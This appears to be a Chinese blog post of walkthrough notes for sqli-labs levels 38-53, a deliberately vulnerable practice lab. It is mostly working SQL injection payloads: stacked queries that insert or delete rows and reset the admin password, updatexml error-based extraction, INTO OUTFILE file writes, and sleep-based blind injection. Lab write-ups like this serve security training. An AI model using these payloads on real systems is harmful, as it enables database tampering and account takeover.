当前位置: 首页 > article >正文

sqli-labs-master靶场训练笔记(38-53|boss战)

article 2024/11/17 21:51:32

2024.2.4

level-38 

(堆叠注入) 

这题乍一看感觉又是来卖萌的,这不是和level-1一模一样吗

然后仔细看了一下源代码,根据 mysqli_multi_query 猜测这题的本意应该是堆叠注入

mysqli_multi_query() 是 PHP 中用于执行多个 SQL 查询语句的函数。这个函数允许你在一个连接中执行多个查询,并返回一个结果标识符,以便你可以逐个获取每个查询的结果。

函数的语法:

mysqli_multi_query(mysqli $connection, string $query)
  • $connection:一个有效的 mysqli 连接标识符。
  • $query:要执行的 SQL 查询语句。

返回值:

  • 如果第一个查询语句执行成功,该函数返回一个结果标识符,你可以使用这个标识符来获取查询结果。如果第一个查询语句失败,该函数将返回 FALSE。
  • 对于后续的查询语句,该函数将返回 TRUE 或 FALSE,具体取决于查询是否成功。

利用堆叠注入进行数据库的篡改 

对users表中插入数据:

?id=1';insert into users(id,username,password) value(15,'2024','干杯!') -- a

为了方便这里的查询操作用cmd显示 

对着level-1试了一下,果然不行

删除刚刚插入的数据

?id=1';delete from users where id=15 -- a

(level-38能有什么坏心思呢,他不过可以多线程操作罢了(๑>ڡ<)☆)

level-39 

 (堆叠注入)

和level-39一样,只是改成了数字型

?id=-1 union select 1,2,3;delete from users where id=15 -- a

level-40 

 (堆叠注入)

都是前几关玩剩下的 

?id=-1') union select 1,2,3;delete from users where id=15 -- a

level-41 

 (堆叠注入)

和level-39一样 

?id=-1 union select 1,2,3;delete from users where id=15 -- a

level-42 

(堆叠注入)

普通用户利用堆叠注入可以修改管理员密码 

login_user=Dumb&login_password=Dumb';update users set password='123456' where username='admin' -- a&mysubmit=Login

level-43 

 (堆叠注入)

') 闭合,其他和level-42一样 

login_user=Dumb&login_password=Dumb';update users set password='123456' where username='admin' -- a&mysubmit=Login

level-44 

 (堆叠注入)

 和level-42一样 

login_user=Dumb&login_password=Dumb';update users set password='123456' where username='admin' -- a&mysubmit=Login

level-45 

 和level-43一样

login_user=Dumb&login_password=Dumb');update users set password='123456' where username='admin' -- a&mysubmit=Login

level-46 

 提示传入sort变量

?sort=1

查看源码可以知道是一个数字型的order by注入

可以直接报错注入或者GETSHELL 

?sort=1 and updatexml(1,concat('~',database(),'~'),1)
?sort=1 into outfile "D:/1.txt"

level-47 

 字符型的order by注入

?sort=1' and updatexml(1,concat('~',database(),'~'),1) -- a

level-48

 数字型,时间盲注引发服务器报错(可能不是正解,但能用(doge))

?sort=1 and if(mid((select+database()),1,1)='a',sleep(5),0) -- a

level-49 

改成了字符型,用 ' 闭合,其他和level-48一样,一招鲜吃遍天

?sort=1' and if(mid((select+database()),1,1)='a',sleep(5),0) -- a

level-50 

level-51 

level-52 

level-53

除了可以堆叠注入,均和上几关相同

看起来所有的 boss 都已经被你轻松斩于马下,去挑战独孤求败的自己吧

sqli-labs-master靶场训练笔记(54-65|决战紫禁之巓)-CSDN博客icon-default.png?t=N7T8https://blog.csdn.net/ymy13326056686/article/details/136039776


http://www.kler.cn/a/232078.html

相关文章:

  • Redis实战案例(黑马点评)
  • C:原反补码
  • v-html 富文本中图片使用element-ui image-viewer组件实现预览,并且阻止滚动条
  • 【大数据学习 | HBASE高级】hive操作hbase
  • STM32 标准库函数 GPIO_SetBits、GPIO_ResetBits、GPIO_WriteBit、GPIO_Write 区别
  • 论文阅读 - Causally Regularized Learning with Agnostic Data Selection
  • STM32——FLASH(1)简单介绍、分类、读写流程及注意事项
  • 百面嵌入式专栏(面试题)C语言面试题22道
  • 命令行任务管理器的at命令
  • 瑞_力扣LeetCode_二叉树相关题
  • Win10系统备份的几种方案,以后不重装系统,备份系统恢复Backup,系统映像备份
  • Python(21)正则表达式中的“元字符”
  • 05 06 Verilog基础语法与应用讲解
  • 【Django-ninja】在django ninja中处理异常
  • Java代码实现基数排序算法(附带源码)
  • 计算机设计大赛 深度学习 机器视觉 人脸识别系统 - opencv python
  • TCP 传输控制协议
  • JenkinsGitLab完成自动化构建部署
  • 2024.2.6
  • 二叉树中的最大路径和
  • mysql学习打卡day22
  • 20240204金融读报1分钟小得
  • 23种设计模式之单例模式
  • Java+微信小程序实现智慧家政系统 JAVA+Vue+SpringBoot+MySQL
  • JVM体系
  • automative